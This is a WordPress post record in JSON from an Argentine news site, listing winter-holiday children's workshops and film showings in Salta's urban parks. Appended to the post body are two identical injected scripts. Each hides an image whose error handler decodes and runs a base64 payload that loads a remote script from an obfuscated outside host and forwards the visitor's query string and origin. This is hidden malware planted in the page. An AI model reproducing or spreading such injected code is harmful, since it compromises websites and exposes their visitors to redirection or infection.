{"id":2872,"date":"2023-07-18T11:10:28","date_gmt":"2023-07-18T14:10:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2872"},"modified":"2025-08-14T00:12:28","modified_gmt":"2025-08-14T03:12:28","slug":"disfruta-las-vacaciones-de-invierno-en-los-parques-urbanos-2","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2872","title":{"rendered":"Disfruta las vacaciones de invierno en los Parques Urbanos"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#920629\"><em>Desde la Administraci\u00f3n de Parques Urbanos informaron que los ni\u00f1os y adolescentes pueden participara de diversas actividades en los Parques del Bicentenario, Sur y de la Familia.<\/em><\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90584-disfruta-las-vacaciones-de-invierno-en-los-parques-urbanos-1.jpg\" alt=\"\" class=\"wp-image-2874\" width=\"283\" height=\"187\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90584-disfruta-las-vacaciones-de-invierno-en-los-parques-urbanos-1.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/07\/90584-disfruta-las-vacaciones-de-invierno-en-los-parques-urbanos-1-300x198.jpg 300w\" sizes=\"(max-width: 283px) 100vw, 283px\" \/><\/figure><\/div>\n\n\n<p>Los ni\u00f1os y adolescentes pueden&nbsp;participara de diversas actividades en los Parques del Bicentenario, Sur y de la Familia; adem\u00e1s, se proyectar\u00e1n pel\u00edculas para toda la familia.&nbsp;<\/p>\n\n\n\n<p>En el Parque de la Familia las actividades requieren inscripci\u00f3n, las mismas se reciben de lunes a viernes de 9 a 13 has al tel\u00e9fono 4713195:&nbsp;<\/p>\n\n\n\n<p><strong>\u00abInvierno m\u00e1gico\u00bb<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Martes 18 de 15 a 17 hs Taller de juegos recreativos \u00abA jugar se ha dicho\u00bb, ni\u00f1os y ni\u00f1as de 6 a 14 a\u00f1os Inscripci\u00f3n previa, cupo hasta 20 personas, en el SUM. Requiere inscripci\u00f3n &nbsp;<\/li>\n\n\n\n<li>Jueves 20 a partir de las 15.30 &nbsp;Taller de telar, pueden asistir ni\u00f1os y ni\u00f1as de 8 a 16 a\u00f1os, se realiza en el SUM, cupo hasta 20 personas. Requiere inscripci\u00f3n &nbsp;<\/li>\n\n\n\n<li>Viernes 21 a las 16 hs Proyecci\u00f3n de pel\u00edcula \u00abMetegol\u00bb, apta para toda la familia; en el SUM cupo 40 personas. Requiere inscripci\u00f3n &nbsp;<\/li>\n\n\n\n<li>S\u00e1bado 22 de 10 a 17hs Feria de Emprendedores en la Plaza de Emprendedores<\/li>\n<\/ul>\n\n\n\n<p>Las actividades con cupo en el Parque del Bicentenario requieren inscripci\u00f3n por WhatsApp al n\u00famero387-4766677<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Martes 18 de 15:30 a 17:00 hs Taller \u201cLlaveritos personalizados\u201d, podr\u00e1n asistir ni\u00f1os de &nbsp;8 a 16. Cupo 20 Personas. Requiere inscripci\u00f3n &nbsp;<\/li>\n\n\n\n<li>Mi\u00e9rcoles 19 de 16:00 a 18:00 hs Taller \u201cBijouterie y adornos\u201d (Reciclado de Cd). Para mayores de 12 a\u00f1os. Cupo 15 Personas. Requiere inscripci\u00f3n &nbsp;<\/li>\n\n\n\n<li>Viernes 21 de 16:00 hs Cine en Pantalla Gigante \u2013 Anfiteatro<\/li>\n\n\n\n<li>Viernes 28 de 16:00 a 18:00 hs Juegos virtuales en pantalla Gigante. Anfiteatro. Inscripciones de lunes 24 a mi\u00e9rcoles 26. Sin cupo. Para todas las edades.<\/li>\n<\/ul>\n\n\n\n<p>El Parque Sur ofrece talleres para ni\u00f1os, los mismos se realizar\u00e1n a &nbsp;la tarde, el tel\u00e9fono para registrar inscripci\u00f3n es el 387 4567871<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Mi\u00e9rcoles 19 a las 15.30 hs Taller \u201cLlaveritos personalizados\u201d, pueden participar ni\u00f1os y ni\u00f1as de 8 a 16 a\u00f1os. Requiere inscripci\u00f3n, cupo hasta 20 personas<\/li>\n\n\n\n<li>Jueves 20 de &nbsp;15:30 a 18:30 has \u201cTaller Telar\u201d, adolescentes a partir de los 14 a\u00f1os. Requiere inscripci\u00f3n, cupo 12 personas<\/li>\n\n\n\n<li>Viernes 21 de 15:30 a 18:30 hs Taller \u201cDibujo M\u00e1gico\u201c, destinado a ni\u00f1os de 6 a 12 a\u00f1os. Requiere inscripci\u00f3n. Cupo 12 personas<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde la Administraci\u00f3n de Parques Urbanos informaron que los ni\u00f1os y adolescentes pueden participara de diversas actividades en los Parques del Bicentenario, Sur y de la Familia. Los ni\u00f1os y adolescentes pueden&nbsp;participara de diversas actividades en los Parques del Bicentenario, Sur y de la Familia; adem\u00e1s, se proyectar\u00e1n pel\u00edculas para toda la familia.&nbsp; En el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2873,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[4,17],"tags":[],"class_list":{"0":"post-2872","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-paisajes","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2872"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2872"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2872\/revisions"}],"predecessor-version":[{"id":7021,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2872\/revisions\/7021"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2873"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2872"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2872"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2872"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}